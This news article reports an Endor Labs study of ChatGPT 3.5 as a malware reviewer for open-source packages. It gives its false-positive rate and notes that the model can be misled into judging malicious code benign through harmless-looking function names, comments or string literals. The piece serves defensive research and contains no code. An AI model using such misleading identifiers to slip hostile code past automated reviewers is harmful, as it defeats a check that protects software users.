ChatGPT-3.5: AI-assisted malware detection still has room for improvement, according to Endor Labs study

To shared

A recent test of the ChatGPT 3.5 artificial intelligence language model has shown that while it can assist in identifying possible malware, it is not yet ready to replace human review. Researchers at Endor Labs tested ChatGPT 3.5 against nearly 2,000 artifacts from open-source code repositories, and while it identified 34 as having malware, only 13 actually had bad code. Five others had obfuscated code but did not exhibit any malicious behavior, while one artifact was a proof-of-concept that downloaded and opened an image through an NPM install hook.

Of the 34 identified by ChatGPT 3.5, 15 were false positives, and the researchers found that the AI can be fooled into classifying malicious code as benign by using innocent function names or comments that suggest benign functionality or by including string literals. Henrik Plate, a researcher at Endor Labs, noted in a blog post that large-language model-assisted malware reviews «can complement, but not yet substitute human reviews.»

While ChatGPT 4 has since been released, giving different results, the researchers say that pre-processing of code snippets, additional effort on prompt engineering, and future models are expected to improve their test results. Microsoft is already using large language models to assess possible malware through its Security CoPilot application.

Plate emphasized that one inherent problem with relying on identifiers and comments to understand code behavior is that they are a valuable source of information for code developed by benign developers but can also be misused by adversaries to evade detection of malicious behavior. While LLM-based assessment should not replace manual reviews, they can be used as an additional signal and input for manual reviews, particularly to automatically review larger numbers of malware signals produced by noisy detectors.


To shared